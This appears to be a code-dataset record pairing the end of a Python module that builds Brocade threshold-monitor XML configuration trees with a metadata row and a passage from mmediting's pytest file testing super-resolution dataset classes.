    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_poll(self, **kwargs):
    """Build a <config> setting threshold-monitor/Cpu/poll.

    Pops 'poll' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "Cpu")
    ET.SubElement(node, "poll").text = kwargs.pop('poll')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_retry(self, **kwargs):
    """Build a <config> setting threshold-monitor/Cpu/retry.

    Pops 'retry' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "Cpu")
    ET.SubElement(node, "retry").text = kwargs.pop('retry')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_limit(self, **kwargs):
    """Build a <config> setting threshold-monitor/Cpu/limit.

    Pops 'limit' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "Cpu")
    ET.SubElement(node, "limit").text = kwargs.pop('limit')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_actions(self, **kwargs):
    """Build a <config> setting threshold-monitor/Cpu/actions.

    Pops 'actions' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "Cpu")
    ET.SubElement(node, "actions").text = kwargs.pop('actions')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_poll(self, **kwargs):
    """Build a <config> setting threshold-monitor/Memory/poll.

    Pops 'poll' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "Memory")
    ET.SubElement(node, "poll").text = kwargs.pop('poll')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_retry(self, **kwargs):
    """Build a <config> setting threshold-monitor/Memory/retry.

    Pops 'retry' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "Memory")
    ET.SubElement(node, "retry").text = kwargs.pop('retry')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_limit(self, **kwargs):
    """Build a <config> setting threshold-monitor/Memory/limit.

    Pops 'limit' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "Memory")
    ET.SubElement(node, "limit").text = kwargs.pop('limit')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_high_limit(self, **kwargs):
    """Build a <config> setting threshold-monitor/Memory/high-limit.

    Pops 'high_limit' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "Memory")
    ET.SubElement(node, "high-limit").text = kwargs.pop('high_limit')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_low_limit(self, **kwargs):
    """Build a <config> setting threshold-monitor/Memory/low-limit.

    Pops 'low_limit' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "Memory")
    ET.SubElement(node, "low-limit").text = kwargs.pop('low_limit')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_actions(self, **kwargs):
    """Build a <config> setting threshold-monitor/Memory/actions.

    Pops 'actions' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "Memory")
    ET.SubElement(node, "actions").text = kwargs.pop('actions')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_apply(self, **kwargs):
    """Build a <config> setting threshold-monitor/interface/apply.

    Pops 'apply' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    ET.SubElement(node, "apply").text = kwargs.pop('apply')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_pause(self, **kwargs):
    """Build a <config> containing an empty threshold-monitor/interface/pause node.

    No leaf value is consumed; the tree goes to kwargs['callback']
    (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    ET.SubElement(node, "pause")
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_policy_name(self, **kwargs):
    """Build a <config> setting interface/policy/policy_name.

    Pops 'policy_name' from kwargs (KeyError if absent) and dispatches via
    kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "policy_name").text = kwargs.pop('policy_name')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_type(self, **kwargs):
    """Build a <config> setting interface/policy/area/type.

    Pops list keys 'policy_name' and 'area_value', then the leaf value
    'type' (KeyError if any is absent), and passes the built element tree
    to kwargs['callback'] (default self._callback).  Returns the
    callback's result.
    """
    config = ET.Element("config")
    threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
    interface = ET.SubElement(threshold_monitor, "interface")
    policy = ET.SubElement(interface, "policy")
    policy_name_key = ET.SubElement(policy, "policy_name")
    policy_name_key.text = kwargs.pop('policy_name')
    area = ET.SubElement(policy, "area")
    area_value_key = ET.SubElement(area, "area_value")
    area_value_key.text = kwargs.pop('area_value')
    # 'type_elem' rather than 'type': the original shadowed the builtin type()
    type_elem = ET.SubElement(area, "type")
    type_elem.text = kwargs.pop('type')
    callback = kwargs.pop('callback', self._callback)
    return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_area_value(self, **kwargs):
    """Build a <config> setting interface/policy/area/area_value.

    Pops list keys 'policy_name' and 'type', then the leaf 'area_value'
    (KeyError if any is absent); dispatches via kwargs['callback']
    (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "policy_name").text = kwargs.pop('policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "type").text = kwargs.pop('type')
    ET.SubElement(area_el, "area_value").text = kwargs.pop('area_value')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_timebase_value(self, **kwargs):
    """Build a <config> setting interface/policy/area/threshold/timebase_value.

    Pops list keys 'policy_name', 'type' and 'area_value', then the leaf
    'timebase_value'; dispatches via kwargs['callback'] (default
    self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "policy_name").text = kwargs.pop('policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "type").text = kwargs.pop('type')
    ET.SubElement(area_el, "area_value").text = kwargs.pop('area_value')
    threshold_el = ET.SubElement(area_el, "threshold")
    ET.SubElement(threshold_el, "timebase_value").text = kwargs.pop('timebase_value')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_high_threshold(self, **kwargs):
    """Build a <config> setting interface/policy/area/threshold/high-threshold.

    Pops list keys 'policy_name', 'type' and 'area_value', then the leaf
    'high_threshold'; dispatches via kwargs['callback'] (default
    self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "policy_name").text = kwargs.pop('policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "type").text = kwargs.pop('type')
    ET.SubElement(area_el, "area_value").text = kwargs.pop('area_value')
    threshold_el = ET.SubElement(area_el, "threshold")
    ET.SubElement(threshold_el, "high-threshold").text = kwargs.pop('high_threshold')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_low_threshold(self, **kwargs):
    """Build a <config> setting interface/policy/area/threshold/low-threshold.

    Pops list keys 'policy_name', 'type' and 'area_value', then the leaf
    'low_threshold'; dispatches via kwargs['callback'] (default
    self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "policy_name").text = kwargs.pop('policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "type").text = kwargs.pop('type')
    ET.SubElement(area_el, "area_value").text = kwargs.pop('area_value')
    threshold_el = ET.SubElement(area_el, "threshold")
    ET.SubElement(threshold_el, "low-threshold").text = kwargs.pop('low_threshold')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_buffer(self, **kwargs):
    """Build a <config> setting interface/policy/area/threshold/buffer.

    Pops list keys 'policy_name', 'type' and 'area_value', then the leaf
    'buffer'; dispatches via kwargs['callback'] (default self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "policy_name").text = kwargs.pop('policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "type").text = kwargs.pop('type')
    ET.SubElement(area_el, "area_value").text = kwargs.pop('area_value')
    threshold_el = ET.SubElement(area_el, "threshold")
    ET.SubElement(threshold_el, "buffer").text = kwargs.pop('buffer')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_above_above_highthresh_action(self, **kwargs):
    """Build a <config> setting interface/policy/area/alert/above/above-highthresh-action.

    Pops list keys 'policy_name', 'type' and 'area_value', then the leaf
    'above_highthresh_action'; dispatches via kwargs['callback'] (default
    self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "policy_name").text = kwargs.pop('policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "type").text = kwargs.pop('type')
    ET.SubElement(area_el, "area_value").text = kwargs.pop('area_value')
    above_el = ET.SubElement(ET.SubElement(area_el, "alert"), "above")
    ET.SubElement(above_el, "above-highthresh-action").text = kwargs.pop('above_highthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_above_above_lowthresh_action(self, **kwargs):
    """Build a <config> setting interface/policy/area/alert/above/above-lowthresh-action.

    Pops list keys 'policy_name', 'type' and 'area_value', then the leaf
    'above_lowthresh_action'; dispatches via kwargs['callback'] (default
    self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "policy_name").text = kwargs.pop('policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "type").text = kwargs.pop('type')
    ET.SubElement(area_el, "area_value").text = kwargs.pop('area_value')
    above_el = ET.SubElement(ET.SubElement(area_el, "alert"), "above")
    ET.SubElement(above_el, "above-lowthresh-action").text = kwargs.pop('above_lowthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_below_below_highthresh_action(self, **kwargs):
    """Build a <config> setting interface/policy/area/alert/below/below-highthresh-action.

    Pops list keys 'policy_name', 'type' and 'area_value', then the leaf
    'below_highthresh_action'; dispatches via kwargs['callback'] (default
    self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "policy_name").text = kwargs.pop('policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "type").text = kwargs.pop('type')
    ET.SubElement(area_el, "area_value").text = kwargs.pop('area_value')
    below_el = ET.SubElement(ET.SubElement(area_el, "alert"), "below")
    ET.SubElement(below_el, "below-highthresh-action").text = kwargs.pop('below_highthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_alert_below_below_lowthresh_action(self, **kwargs):
    """Build a <config> setting interface/policy/area/alert/below/below-lowthresh-action.

    Pops list keys 'policy_name', 'type' and 'area_value', then the leaf
    'below_lowthresh_action'; dispatches via kwargs['callback'] (default
    self._callback).
    """
    config = ET.Element("config")
    node = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    node = ET.SubElement(node, "threshold-monitor")
    node = ET.SubElement(node, "interface")
    policy_el = ET.SubElement(node, "policy")
    ET.SubElement(policy_el, "policy_name").text = kwargs.pop('policy_name')
    area_el = ET.SubElement(policy_el, "area")
    ET.SubElement(area_el, "type").text = kwargs.pop('type')
    ET.SubElement(area_el, "area_value").text = kwargs.pop('area_value')
    below_el = ET.SubElement(ET.SubElement(area_el, "alert"), "below")
    ET.SubElement(below_el, "below-lowthresh-action").text = kwargs.pop('below_lowthresh_action')
    return kwargs.pop('callback', self._callback)(config)
| 52.898442
| 140
| 0.686427
| 9,639
| 84,902
| 5.788775
| 0.006432
| 0.232553
| 0.141941
| 0.100004
| 0.997455
| 0.997455
| 0.997455
| 0.997455
| 0.997455
| 0.997455
| 0
| 0
| 0.196898
| 84,902
| 1,605
| 141
| 52.898442
| 0.818332
| 0.031295
| 0
| 0.996769
| 1
| 0
| 0.187064
| 0.088666
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073506
| false
| 0
| 0.000808
| 0
| 0.147819
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7c343dbf0831a3932d9e96476ae4eb7e75f2113f
| 33,836
|
py
|
Python
|
tests/test_data/test_datasets/test_sr_dataset.py
|
orangeccc/mmediting
|
d59249682bbbfa391b4051e4e46b9cdedef94dfe
|
[
"Apache-2.0"
] | 1
|
2021-07-20T08:20:04.000Z
|
2021-07-20T08:20:04.000Z
|
tests/test_data/test_datasets/test_sr_dataset.py
|
orangeccc/mmediting
|
d59249682bbbfa391b4051e4e46b9cdedef94dfe
|
[
"Apache-2.0"
] | null | null | null |
tests/test_data/test_datasets/test_sr_dataset.py
|
orangeccc/mmediting
|
d59249682bbbfa391b4051e4e46b9cdedef94dfe
|
[
"Apache-2.0"
] | 2
|
2021-12-26T16:23:09.000Z
|
2021-12-28T03:44:10.000Z
|
from pathlib import Path
from unittest.mock import patch
import numpy as np
import pytest
from mmcv.utils.testing import assert_dict_has_keys
from mmedit.datasets import (BaseSRDataset, SRAnnotationDataset,
SRFacialLandmarkDataset, SRFolderDataset,
SRFolderGTDataset, SRFolderMultipleGTDataset,
SRFolderRefDataset, SRFolderVideoDataset,
SRLmdbDataset, SRREDSDataset,
SRREDSMultipleGTDataset, SRTestMultipleGTDataset,
SRVid4Dataset, SRVimeo90KDataset,
SRVimeo90KMultipleGTDataset)
def mock_open(*args, **kwargs):
    """Wrap unittest.mock.mock_open so the file mock supports iteration.

    unittest.mock.mock_open does not support iterating over the mocked
    file object; wire ``__iter__`` through ``readline`` to fix that.
    Reference: https://stackoverflow.com/a/41656192
    """
    import unittest
    mocked = unittest.mock.mock_open(*args, **kwargs)
    mocked.return_value.__iter__ = lambda self: iter(self.readline, '')
    return mocked
class TestSRDatasets:
@classmethod
def setup_class(cls):
    """Cache the shared test-data directory (tests/data) on the class."""
    here = Path(__file__)
    cls.data_prefix = here.parent.parent.parent / 'data'
def test_base_super_resolution_dataset(self):
    """BaseSRDataset: scan_folder accepts Path/str and evaluate() averages metrics."""

    class ToyDataset(BaseSRDataset):
        """Toy dataset for testing SRDataset."""

        def __init__(self, pipeline, test_mode=False):
            super().__init__(pipeline, test_mode)

        def load_annotations(self):
            pass

        def __len__(self):
            return 2

    toy_dataset = ToyDataset(pipeline=[])
    file_paths = ['gt/baboon.png', 'lq/baboon_x4.png']
    file_paths = [str(self.data_prefix / v) for v in file_paths]

    # scan_folder should accept both a Path object and a plain string,
    # and reject anything else with TypeError.
    result = toy_dataset.scan_folder(self.data_prefix)
    assert set(file_paths).issubset(set(result))
    result = toy_dataset.scan_folder(str(self.data_prefix))
    assert set(file_paths).issubset(set(result))
    with pytest.raises(TypeError):
        toy_dataset.scan_folder(123)

    # test evaluate function
    results = [{
        'eval_result': {
            'PSNR': 20,
            'SSIM': 0.6
        }
    }, {
        'eval_result': {
            'PSNR': 30,
            'SSIM': 0.8
        }
    }]

    with pytest.raises(TypeError):
        # results must be a list
        toy_dataset.evaluate(results=5)
    with pytest.raises(AssertionError):
        # The length of results should be equal to the dataset len
        toy_dataset.evaluate(results=[results[0]])

    # evaluate() averages each metric over all samples
    eval_results = toy_dataset.evaluate(results=results)
    assert eval_results == {'PSNR': 25, 'SSIM': 0.7}

    with pytest.raises(AssertionError):
        results = [{
            'eval_result': {
                'PSNR': 20,
                'SSIM': 0.6
            }
        }, {
            'eval_result': {
                'PSNR': 30
            }
        }]
        # Length of evaluation result should be the same as the dataset len
        toy_dataset.evaluate(results=results)
def test_sr_annotation_dataset(self):
    """SRAnnotationDataset: pairs lq/gt via an annotation file; Path and str inputs."""
    # setup
    anno_file_path = self.data_prefix / 'train.txt'
    sr_pipeline = [
        dict(type='LoadImageFromFile', io_backend='disk', key='lq'),
        dict(type='LoadImageFromFile', io_backend='disk', key='gt'),
        dict(type='PairedRandomCrop', gt_patch_size=128),
        dict(type='ImageToTensor', keys=['lq', 'gt'])
    ]
    target_keys = [
        'lq_path', 'gt_path', 'scale', 'lq', 'lq_ori_shape', 'gt',
        'gt_ori_shape'
    ]

    # input path is Path object
    sr_annotation_dataset = SRAnnotationDataset(
        lq_folder=self.data_prefix / 'lq',
        gt_folder=self.data_prefix / 'gt',
        ann_file=anno_file_path,
        pipeline=sr_pipeline,
        scale=4,
        filename_tmpl='{}_x4')
    data_infos = sr_annotation_dataset.data_infos
    assert data_infos == [
        dict(
            lq_path=str(self.data_prefix / 'lq' / 'baboon_x4.png'),
            gt_path=str(self.data_prefix / 'gt' / 'baboon.png'))
    ]
    result = sr_annotation_dataset[0]
    assert (len(sr_annotation_dataset) == 1)
    assert assert_dict_has_keys(result, target_keys)

    # input path is str
    sr_annotation_dataset = SRAnnotationDataset(
        lq_folder=str(self.data_prefix / 'lq'),
        gt_folder=str(self.data_prefix / 'gt'),
        ann_file=str(anno_file_path),
        pipeline=sr_pipeline,
        scale=4,
        filename_tmpl='{}_x4')
    data_infos = sr_annotation_dataset.data_infos
    assert data_infos == [
        dict(
            lq_path=str(self.data_prefix / 'lq' / 'baboon_x4.png'),
            gt_path=str(self.data_prefix / 'gt' / 'baboon.png'))
    ]
    result = sr_annotation_dataset[0]
    assert (len(sr_annotation_dataset) == 1)
    assert assert_dict_has_keys(result, target_keys)
def test_sr_folder_dataset(self):
    """SRFolderDataset: pairs lq/gt by folder scan; Path and str inputs."""
    # setup
    sr_pipeline = [
        dict(type='LoadImageFromFile', io_backend='disk', key='lq'),
        dict(type='LoadImageFromFile', io_backend='disk', key='gt'),
        dict(type='PairedRandomCrop', gt_patch_size=128),
        dict(type='ImageToTensor', keys=['lq', 'gt'])
    ]
    target_keys = ['lq_path', 'gt_path', 'scale', 'lq', 'gt']
    lq_folder = self.data_prefix / 'lq'
    gt_folder = self.data_prefix / 'gt'
    filename_tmpl = '{}_x4'

    # input path is Path object
    sr_folder_dataset = SRFolderDataset(
        lq_folder=lq_folder,
        gt_folder=gt_folder,
        pipeline=sr_pipeline,
        scale=4,
        filename_tmpl=filename_tmpl)
    data_infos = sr_folder_dataset.data_infos
    assert data_infos == [
        dict(
            lq_path=str(lq_folder / 'baboon_x4.png'),
            gt_path=str(gt_folder / 'baboon.png'))
    ]
    result = sr_folder_dataset[0]
    assert (len(sr_folder_dataset) == 1)
    assert assert_dict_has_keys(result, target_keys)

    # input path is str
    sr_folder_dataset = SRFolderDataset(
        lq_folder=str(lq_folder),
        gt_folder=str(gt_folder),
        pipeline=sr_pipeline,
        scale=4,
        filename_tmpl=filename_tmpl)
    data_infos = sr_folder_dataset.data_infos
    assert data_infos == [
        dict(
            lq_path=str(lq_folder / 'baboon_x4.png'),
            gt_path=str(gt_folder / 'baboon.png'))
    ]
    result = sr_folder_dataset[0]
    assert (len(sr_folder_dataset) == 1)
    assert assert_dict_has_keys(result, target_keys)
def test_sr_folder_gt_dataset(self):
    """SRFolderGTDataset: gt-only folder scan; Path and str inputs."""
    # setup
    sr_pipeline = [
        dict(type='LoadImageFromFile', io_backend='disk', key='gt'),
        dict(type='ImageToTensor', keys=['gt'])
    ]
    target_keys = ['gt_path', 'gt']
    gt_folder = self.data_prefix / 'gt'
    filename_tmpl = '{}_x4'

    # input path is Path object
    sr_folder_dataset = SRFolderGTDataset(
        gt_folder=gt_folder,
        pipeline=sr_pipeline,
        scale=4,
        filename_tmpl=filename_tmpl)
    data_infos = sr_folder_dataset.data_infos
    assert data_infos == [dict(gt_path=str(gt_folder / 'baboon.png'))]
    result = sr_folder_dataset[0]
    assert (len(sr_folder_dataset) == 1)
    assert assert_dict_has_keys(result, target_keys)

    # input path is str
    sr_folder_dataset = SRFolderGTDataset(
        gt_folder=str(gt_folder),
        pipeline=sr_pipeline,
        scale=4,
        filename_tmpl=filename_tmpl)
    data_infos = sr_folder_dataset.data_infos
    assert data_infos == [dict(gt_path=str(gt_folder / 'baboon.png'))]
    result = sr_folder_dataset[0]
    assert (len(sr_folder_dataset) == 1)
    assert assert_dict_has_keys(result, target_keys)
    def test_sr_folder_ref_dataset(self):
        """Test SRFolderRefDataset with lq/gt/ref folders given as Path or str.

        Also checks that folders whose contents do not pair up, and missing
        lq/gt folders, are rejected with AssertionError at construction time.
        """
        # setup
        sr_pipeline = [
            dict(type='LoadImageFromFile', io_backend='disk', key='lq'),
            dict(type='LoadImageFromFile', io_backend='disk', key='gt'),
            dict(type='LoadImageFromFile', io_backend='disk', key='ref'),
            dict(type='PairedRandomCrop', gt_patch_size=128),
            dict(type='ImageToTensor', keys=['lq', 'gt', 'ref'])
        ]
        target_keys = [
            'lq_path', 'gt_path', 'ref_path', 'scale', 'lq', 'gt', 'ref'
        ]
        lq_folder = self.data_prefix / 'lq'
        gt_folder = self.data_prefix / 'gt'
        # the fixture reuses the gt folder as the reference folder
        ref_folder = self.data_prefix / 'gt'
        filename_tmpl = '{}_x4'
        # input path is Path object
        sr_folder_ref_dataset = SRFolderRefDataset(
            lq_folder=lq_folder,
            gt_folder=gt_folder,
            ref_folder=str(ref_folder),
            pipeline=sr_pipeline,
            scale=4,
            filename_tmpl_lq=filename_tmpl)
        data_infos = sr_folder_ref_dataset.data_infos
        assert data_infos == [
            dict(
                lq_path=str(lq_folder / 'baboon_x4.png'),
                gt_path=str(gt_folder / 'baboon.png'),
                ref_path=str(ref_folder / 'baboon.png'))
        ]
        result = sr_folder_ref_dataset[0]
        assert len(sr_folder_ref_dataset) == 1
        assert assert_dict_has_keys(result, target_keys)
        # input path is str
        sr_folder_ref_dataset = SRFolderRefDataset(
            lq_folder=str(lq_folder),
            gt_folder=str(gt_folder),
            ref_folder=str(ref_folder),
            pipeline=sr_pipeline,
            scale=4,
            filename_tmpl_lq=filename_tmpl)
        data_infos = sr_folder_ref_dataset.data_infos
        assert data_infos == [
            dict(
                lq_path=str(lq_folder / 'baboon_x4.png'),
                gt_path=str(gt_folder / 'baboon.png'),
                ref_path=str(ref_folder / 'baboon.png'))
        ]
        result = sr_folder_ref_dataset[0]
        assert len(sr_folder_ref_dataset) == 1
        assert assert_dict_has_keys(result, target_keys)
        # folders whose contents do not pair with lq must be rejected
        with pytest.raises(AssertionError):
            sr_folder_ref_dataset = SRFolderRefDataset(
                lq_folder=str(lq_folder),
                gt_folder=str(self.data_prefix / 'image'),  # fake gt_folder
                ref_folder=str(ref_folder),
                pipeline=sr_pipeline,
                scale=4,
                filename_tmpl_lq=filename_tmpl)
        with pytest.raises(AssertionError):
            sr_folder_ref_dataset = SRFolderRefDataset(
                lq_folder=str(self.data_prefix / 'image'),  # fake lq_folder
                gt_folder=str(gt_folder),
                ref_folder=str(ref_folder),
                pipeline=sr_pipeline,
                scale=4,
                filename_tmpl_lq=filename_tmpl)
        with pytest.raises(AssertionError):
            sr_folder_ref_dataset = SRFolderRefDataset(
                lq_folder=str(lq_folder),
                gt_folder=str(self.data_prefix / 'bg'),  # fake gt_folder
                ref_folder=str(ref_folder),
                pipeline=sr_pipeline,
                scale=4,
                filename_tmpl_lq=filename_tmpl)
        with pytest.raises(AssertionError):
            sr_folder_ref_dataset = SRFolderRefDataset(
                lq_folder=str(self.data_prefix / 'bg'),  # fake lq_folder
                gt_folder=str(gt_folder),
                ref_folder=str(ref_folder),
                pipeline=sr_pipeline,
                scale=4,
                filename_tmpl_lq=filename_tmpl)
        # at least one of lq_folder/gt_folder must be provided
        with pytest.raises(AssertionError):
            sr_folder_ref_dataset = SRFolderRefDataset(
                lq_folder=None,
                gt_folder=None,
                ref_folder=str(ref_folder),
                pipeline=sr_pipeline,
                scale=4,
                filename_tmpl_lq=filename_tmpl)
def test_sr_landmark_dataset(self):
# setup
sr_pipeline = [
dict(
type='LoadImageFromFile',
io_backend='disk',
key='gt',
flag='color',
channel_order='rgb',
backend='cv2')
]
target_keys = ['gt_path', 'bbox', 'shape', 'landmark']
gt_folder = self.data_prefix / 'face'
ann_file = self.data_prefix / 'facemark_ann.npy'
# input path is Path object
sr_landmark_dataset = SRFacialLandmarkDataset(
gt_folder=gt_folder,
ann_file=ann_file,
pipeline=sr_pipeline,
scale=4)
data_infos = sr_landmark_dataset.data_infos
assert len(data_infos) == 1
